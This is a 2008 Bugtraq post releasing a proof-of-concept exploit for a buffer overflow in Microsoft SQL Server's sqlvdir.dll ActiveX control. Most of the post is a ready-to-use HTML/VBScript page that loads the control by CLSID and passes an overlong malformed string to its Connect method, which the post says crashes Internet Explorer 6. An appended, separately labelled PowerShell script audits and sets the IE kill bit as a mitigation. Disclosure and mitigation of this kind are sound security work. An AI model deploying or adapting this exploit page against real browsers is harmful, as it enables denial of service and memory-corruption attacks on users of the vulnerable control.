Date: Thu, 11 Sep 2008 04:21:06 -0600
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al    # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                # 
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : beenudel1986@...il.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successful exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
################################################# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
################################################# 
 
 
<html> 
Test Exploit page 
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> 
<script language='vbscript'> 
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" 
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )" 
memberName = "Connect" 
progid     = "SQLVDIRLib.SQLVDirControl" 
argCount   = 2 
arg1="defaultV" 
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\te 
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test 
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes 
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\ 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" 
 
target.Connect arg1 ,arg2 
 
</script> 
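
The header of the post records `KillBitSet: False` for this control. The following is an added example, not part of the original post: a PowerShell audit of the Internet Explorer kill bit for the CLSID the post lists, with an optional function to set it. The function and variable names are illustrative; the registry location and the 0x400 flag are the standard "ActiveX Compatibility" mechanism.

```powershell
# Added example, not from the original post. The CLSID is the one the post lists.
$Clsid   = '{FC13BAA2-9C1A-4069-A221-31A147636038}'
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE instantiating a control
$Roots   = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    # 32-bit IE on 64-bit Windows reads the WOW6432Node view
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBit {
    # Reports the current flags for the control under one registry view.
    param([string]$Root)
    $key   = Join-Path $Root $Clsid
    $flags = $null
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
        if ($prop -and $prop.PSObject.Properties['Compatibility Flags']) {
            $flags = $prop.'Compatibility Flags'
        }
    }
    [pscustomobject]@{
        Key        = $key
        Flags      = $flags
        KillBitSet = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
    }
}

function Set-KillBit {
    # Requires an elevated session. Keeps any compatibility flags already present.
    param([string]$Root)
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-KillBit -Root $Root).Flags
    $new = if ($null -ne $current) { $current -bor $KillBit } else { $KillBit }
    New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
        -PropertyType DWord -Value $new -Force | Out-Null
}

# Audit only the registry views that exist on this machine.
$Present = $Roots | Where-Object { Test-Path -LiteralPath (Split-Path $_ -Parent) }
$Present | ForEach-Object { Get-KillBit -Root $_ } | Format-Table -AutoSize

# To apply the mitigation, uncomment:
# $Present | ForEach-Object { Set-KillBit -Root $_ }
```

Setting the kill bit only affects instantiation inside Internet Explorer and hosts that honour it; the DLL stays registered for other COM clients.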
